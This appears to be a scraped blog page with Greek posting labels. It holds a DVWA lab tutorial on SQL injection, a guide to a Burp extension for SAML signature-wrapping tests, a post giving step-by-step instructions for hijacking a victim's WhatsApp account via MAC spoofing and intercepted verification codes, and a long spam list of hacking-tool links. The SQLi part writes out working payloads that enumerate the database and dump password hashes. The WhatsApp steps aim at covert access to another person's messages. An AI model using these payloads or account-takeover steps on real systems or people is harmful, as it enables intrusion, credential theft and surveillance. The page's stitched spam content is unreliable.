Πέμπτη 18 Ιανουαρίου 2024

Learning Web Pentesting With DVWA Part 2: SQL Injection

In the last article Learning Web Pentesting With DVWA Part 1: Installation, you were given a glimpse of SQL injection when we installed the DVWA app. In this article we will explain what we did at the end of that article and much more.
Lets start by defining what SQL injection is, OWASP defines it as: "A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands."
Which basically means that we can use a simple (vulnerable) input field in our web application to get information from the database of the server which hosts the web application. We can command and control (at certain times) the database of the web application or even the server.
In this article we are going to perform SQL injection attack on DVWA, so let's jump in. On the DVWA welcome page click on SQL Injection navigation link. We are presented with a page with an input field for User ID.
Now lets try to input a value like 1 in the input field. We can see a response from server telling us the firstname and surname of the user associated with User ID 1.
If we try to enter a user id which doesn't exist, we get no data back from the server. To determine whether an input field is vulnerable to SQL injection, we first start by sending a single quote (') as input. Which returns an SQL error.
We saw this in the previous article and we also talked about injection point in it. Before diving deeper into how this vulnerability can be exploited lets try to understand how this error might have occurred. Lets try to build the SQL query that the server might be trying to execute. Say the query looks something like this:
SELECT first_name, sur_name FROM users WHERE user_id = '1';
The 1 in this query is the value supplied by the user in the User ID input field. When we input a single quote in the User ID input field, the query looks like this:
SELECT first_name, sur_name FROM users WHERE user_id = ''';
The quotes around the input provided in the User ID input field are from the server side application code. The error is due to the extra single quote present in the query. Now if we specify a comment after the single quote like this:
'-- -
or
'#
we should get no error. Now our crafted query looks like this:
SELECT first_name, sur_name FROM users WHERE user_id = ''-- -';
or
SELECT first_name, sur_name FROM users WHERE user_id = ''#';
since everything after the # or -- - are commented out, the query will ignore the extra single quote added by the server side app and whatever comes after it and will not generate any error. However the query returns nothing because we specified nothing ('') as the user_id.
After knowing how things might be working on the server side, we will start to attack the application.
First of all we will try to determine the number of columns that the query outputs because if we try a query which will output the number of columns greater or smaller than what the original query outputs then our query is going to get an error. So we will first figure out the exact number of columns that the query outputs and we will do that with the help of order by sql statement like this:
' order by 1-- -
This MySQL server might execute the query as:
SELECT first_name, sur_name FROM users WHERE user_id = '' order by 1-- -';
you get the idea now.
if we don't get any error message, we will increase the number to 2 like this:
' order by 2-- -
still no error message, lets add another:
' order by 3-- -
and there we go we have an error message. Which tells us the number of columns that the server query selects is 2 because it erred out at 3.
Now lets use the union select SQL statement to get information about the database itself.
' union select null, version()-- -
You should first understand what a union select statement does and only then can you understand what we are doing here. You can read about it here.
We have used null as one column since we need to match the number of columns from the server query which is two. null will act as a dummy column here which will give no output and the second column which in our case here is the version() command will output the database version. Notice the output from the application, nothing is shown for First name since we specified null for it and the maria db version will be displayed in Surname.
Now lets check who the database user is using the user() function of mariadb:
' union select null, user()-- -
After clicking the submit button you should be able to see the user of the database in surname.

Now lets get some information about the databases in the database.
Lets determine the names of databases from INFORMATION_SCHEMA.SCHEMATA by entering following input in the User ID field:
' union select null, SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA-- -
This lists two databases dvwa and information_schema. information_schema is the built in database. Lets look at the dvwa database.
Get table names for dvwa database from INFORMATION_SCHEMA.TABLES
' union select null, TABLE_NAME from INFORMATION_SCHEMA.TABLES-- -
It gives a huge number of tables that are present in dvwa database. But what we are really interested in is the users table as it is most likely to contain user passwords. But first we need to determine columns of that table and we will do that by querying INFORMATION_SCHEMA.COLUMNS like this:
' union select null, COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'-- -

We can see the password column in the output now lets get those passwords:
' union select user, password from users-- -
Of-course those are the hashes and not plain text passwords. You need to crack them.
Hope you learned something about SQL injection in this article. See you next time.

References:

1. SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
2. MySQL UNION: https://www.mysqltutorial.org/sql-union-mysql.aspx
3. Chapter 25 INFORMATION_SCHEMA Tables: https://dev.mysql.com/doc/refman/8.0/en/information-schema.html

Related word


Αναρτήθηκε από στις Δεν υπάρχουν σχόλια:

Τετάρτη 17 Ιανουαρίου 2024

Testing SAML Endpoints For XML Signature Wrapping Vulnerabilities

A lot can go wrong when validating SAML messages. When auditing SAML endpoints, it's important to look out for vulnerabilities in the signature validation logic. XML Signature Wrapping (XSW) against SAML is an attack where manipulated SAML message is submitted in an attempt to make the endpoint validate the signed parts of the message -- which were correctly validated -- while processing a different attacker-generated part of the message as a way to extract the authentication statements. Because the attacker can arbitrarily forge SAML assertions which are accepted as valid by the vulnerable endpoint, the impact can be severe. [1,2,3]

Testing for XSW vulnerabilities in SAML endpoints can be a tedious process, as the auditor needs to not only know the details of the various XSW techniques, but also must handle a multitude of repetitive copy-and-paste tasks and apply the appropriate encoding onto each message. The latest revision of the XSW-Attacker module in our BurpSuite extension EsPReSSo helps to make this testing process easier, and even comes with a semi-automated mode. Read on to learn more about the new release! 

 SAML XSW-Attacker

After a signed SAML message has been intercepted using the Burp Proxy and shown in EsPReSSO, you can open the XSW-Attacker by navigating to the SAML tab and then the Attacker tab.  Select Signature Wrapping from the drop down menu, as shown in the screenshot below:



To simplify its use, the XSW-Attacker performs the attack in a two step process of initialization and execution, as reflected by its two tabs Init Attack and Execute Attack. The interface of the XSW-Attacker is depicted below.
XSW-Attacker overview

The Init Attack tab displays the current SAML message. To execute a signature wrapping attack, a payload needs to be configured in a way that values of the originally signed message are replaced with values of the attacker's choice. To do this, enter the value of a text-node you wish to replace in the Current value text-field. Insert the replacement value in the text-field labeled New value and click the Add button. Multiple values can be provided; however, all of which must be child nodes of the signed element. Valid substitution pairs and the corresponding XPath selectors are displayed in the Modifications Table. To delete an entry from the table, select the entry and press `Del`, or use the right-click menu.

Next, click the Generate vectors button - this will prepare the payloads accordingly and brings the Execute Attack tab to the front of the screen.

At the top of the Execute Attack tab, select one of the pre-generated payloads. The structure of the selected vector is explained in a shorthand syntax in the text area below the selector.
The text-area labeled Attack vector is editable and can be used to manually fine-tune the chosen payload if necessary. The button Pretty print opens up a syntax-highlighted overview of the current vector.
To submit the manipulated SAML response, use Burp's Forward button (or Go, while in the Repeater).

Automating XSW-Attacker with Burp Intruder

Burp's Intruder tool allows the sending of automated requests with varying payloads to a test target and analyzes the responses. EsPReSSO now includes a Payload Generator called XSW Payloads to facilitate when testing the XML processing endpoints for XSW vulnerabilities. The following paragraphs explain how to use the automated XSW attacker with a SAML response.

First, open an intercepted request in Burp's Intruder (e.g., by pressing `Ctrl+i`). For the attack type, select Sniper. Open the Intruder's Positions tab, clear all payload positions but the value of the XML message (the `SAMLResponse` parameter, in our example). Note: the XSW-Attacker can only handle XML messages that contain exactly one XML Signature.
Next, switch to the Payloads tab and for the Payload Type, select Extension-generated. From the newly added Select generator drop-down menu, choose XSW Payloads, as depicted in the screenshot below.



While still in the Payloads tab, disable the URL-encoding checkbox in the Payload Encoding section, since Burp Intruder deals with the encoding automatically and should suffice for most cases.
Click the Start Attack button and a new window will pop up. This window is shown below and is similar to the XSW Attacker's Init Attack tab.


Configure the payload as explained in the section above. In addition, a schema analyzer can be selected and checkboxes at the bottom of the window allow the tester to choose a specific encoding. However, for most cases the detected presets should be correct.

Click the Start Attack button and the Intruder will start sending each of the pre-generated vectors to the configured endpoint. Note that this may result in a huge number of outgoing requests. To make it easier to recognize the successful Signature Wrapping attacks, it is recommended to use the Intruder's Grep-Match functionality. As an example, consider adding the replacement values from the Modifications Table as a Grep-Match rule in the Intruder's Options tab. By doing so, a successful attack vector will be marked with a checkmark in the results table, if the response includes any of the configure grep rules.

Credits

EsPReSSO's XSW Attacker is based on the WS-Attacker [4] library by Christian Mainka and the original adoption for EsPReSSO has been implemented by Tim Günther.
Our students Nurullah Erinola, Nils Engelberts and David Herring did a great job improving the execution of XSW and implementing a much better UI.

---

[1] On Breaking SAML - Be Whoever You Want to Be
[2] Your Software at My Service
[3] Se­cu­ri­ty Ana­ly­sis of XAdES Va­li­da­ti­on in the CEF Di­gi­tal Si­gna­tu­re Ser­vices (DSS)
[4] WS-Attacker

Related articles


Αναρτήθηκε από στις Δεν υπάρχουν σχόλια:

HOW TO HACK WHATSAPP ACCOUNT? – WHATSAPP HACK

In the last article, I have discussed a method on WhatsApp hack using SpyStealth Premium App. Today I am gonna show you an advanced method to hack WhatsApp account by mac spoofing. It's a bit more complicated than the last method discussed and requires proper attention. It involves the spoofing of the mac address of the target device. Let's move on how to perform the attack.

SO, HOW TO HACK WHATSAPP ACCOUNT?                                                          

STEP TO FOLLOW FOR WHATSAPP HACK

Here I will show you complete tutorial step by step of hacking WhatsApp account. Just understand each step carefully so this WhatsApp hack could work great.
  1. Find out the victim's phone and note down it's Mac address. To get the mac address in Android devices, go to Settings > About Phone > Status > Wifi Mac address. And here you'll see the mac address. Just write it somewhere. We'll use it in the upcoming steps.
  2. As you get the target's mac address, you have to change your phone's mac address with the target's mac address. Perform the steps mentioned in this article on how to spoof mac address in android phones.
  3. Now install WhatsApp on your phone and use victim's number while you're creating an account. It'll send a verification code to victim's phone. Just grab the code and enter it here.
  4. Once you do that, it'll set all and you'll get all chats and messages which victims sends or receives.
This method is really a good one but a little difficult for the non-technical users. Only use this method if you're technical skills and have time to perform every step carefully. Otherwise, you can hack WhatsApp account using Spying app.
If you want to know how to be on the safer edge from WhatsApp hack, you can follow this article how to protect WhatsApp from being hacked.

More information


  1. Best Hacking Tools 2019
  2. Hacking App
  3. Hack Tools
  4. Hacking Tools Mac
  5. Hacking Tools 2020
  6. Hacking Tools
  7. Hack And Tools
  8. Hack Tools
  9. Nsa Hack Tools Download
  10. Hacking Tools Kit
  11. Hack Tools
  12. Hack Website Online Tool
  13. Hack App
  14. Pentest Tools Linux
  15. Hacker Security Tools
  16. Physical Pentest Tools
  17. Pentest Tools Subdomain
  18. Hacker Tools 2020
  19. Pentest Recon Tools
  20. Hacking Tools Pc
  21. Hacking Tools Pc
  22. Hacker Tools 2019
  23. Hacking Tools For Pc
  24. New Hacker Tools
  25. Tools Used For Hacking
  26. Hacking Tools For Windows Free Download
  27. Hacker Tools Software
  28. Pentest Tools Open Source
  29. New Hacker Tools
  30. Hack Apps
  31. How To Make Hacking Tools
  32. Pentest Tools Nmap
  33. Hacking Tools Name
  34. New Hacker Tools
  35. Install Pentest Tools Ubuntu
  36. Hack Rom Tools
  37. Hacking Tools For Kali Linux
  38. Blackhat Hacker Tools
  39. New Hacker Tools
  40. Hacker Tools For Ios
  41. Hacker Search Tools
  42. Pentest Tools Find Subdomains
  43. Hack Rom Tools
  44. Beginner Hacker Tools
  45. Pentest Tools Android
  46. Pentest Tools Alternative
  47. Hacker Tool Kit
  48. Game Hacking
  49. Best Hacking Tools 2019
  50. Github Hacking Tools
  51. Hack Tools For Games
  52. Pentest Tools Linux
  53. Wifi Hacker Tools For Windows
  54. What Are Hacking Tools
  55. Android Hack Tools Github
  56. Hack Tools For Mac
  57. Hacker Tools For Mac
  58. Pentest Tools Framework
  59. Pentest Recon Tools
  60. Black Hat Hacker Tools
  61. Beginner Hacker Tools
  62. Hacking Tools Name
  63. Hack Tools For Windows
  64. Pentest Tools Linux
  65. Hacker Tools For Mac
  66. Pentest Tools Online
  67. Github Hacking Tools
  68. Computer Hacker
  69. Hack Tools Mac
  70. Pentest Tools For Windows
  71. Hacking Tools 2019
  72. Bluetooth Hacking Tools Kali
  73. Pentest Tools Url Fuzzer
  74. Pentest Tools For Windows
  75. Hackers Toolbox
  76. Pentest Tools Android
  77. Wifi Hacker Tools For Windows
  78. Physical Pentest Tools
  79. Hacker Tools Software
  80. Pentest Tools Nmap
  81. Hack Tools Download
  82. Hacker
  83. Hacking Tools 2020
  84. Pentest Tools Alternative
  85. Growth Hacker Tools
  86. Pentest Box Tools Download
  87. Hacking Tools For Beginners
  88. Pentest Recon Tools
  89. Bluetooth Hacking Tools Kali
  90. Hacker Tools Linux
  91. Pentest Tools Download
  92. Hacker Tools Software
  93. Pentest Tools Website
  94. Hack Tools For Ubuntu
  95. Usb Pentest Tools
  96. Hacking Tools For Mac
  97. Hacking Tools For Beginners
  98. Hacking Tools 2019
  99. Pentest Tools Url Fuzzer
  100. Physical Pentest Tools
  101. Pentest Tools Framework
  102. Best Hacking Tools 2019
  103. Tools For Hacker
  104. Hacking Tools 2020
  105. Hacking Tools Mac
  106. Hacker Techniques Tools And Incident Handling
  107. Hacking Tools For Pc
  108. Hacking Tools For Windows Free Download
  109. Hacker Tools Hardware
  110. What Are Hacking Tools
  111. Hack Tools For Mac
  112. Hacking App
  113. Hack Tools Download
  114. Tools For Hacker
  115. Pentest Automation Tools
  116. Hacker Tool Kit
  117. How To Hack
  118. Hack Tools Online
  119. Hack App
  120. Hack Tools Online
  121. Hacking Tools Usb
  122. Hacker Tools 2020
  123. Hacker Tools For Pc
  124. Hacking Tools 2019
  125. World No 1 Hacker Software
  126. Wifi Hacker Tools For Windows
  127. Pentest Tools Nmap
  128. Wifi Hacker Tools For Windows
  129. Beginner Hacker Tools
  130. Kik Hack Tools
  131. Pentest Tools Website
  132. Pentest Tools For Android
  133. Pentest Tools Kali Linux
  134. Hak5 Tools
  135. Hacking Tools For Beginners
  136. Tools Used For Hacking
  137. Underground Hacker Sites
  138. Hacking Tools
  139. Hacking Tools
  140. Hacker Tools Linux
  141. Best Hacking Tools 2020
  142. Pentest Box Tools Download
  143. Hacker Tools 2020
  144. Hack Tools For Mac
  145. Pentest Box Tools Download
  146. Hacker Tools
  147. Bluetooth Hacking Tools Kali
  148. Hacking Tools 2020
  149. How To Install Pentest Tools In Ubuntu
  150. Pentest Tools Website
  151. Pentest Tools Port Scanner
  152. New Hacker Tools
  153. Pentest Tools For Ubuntu
  154. Pentest Tools Download
  155. What Are Hacking Tools
  156. Usb Pentest Tools
Αναρτήθηκε από στις Δεν υπάρχουν σχόλια:
Εγγραφή σε: Αναρτήσεις (Atom)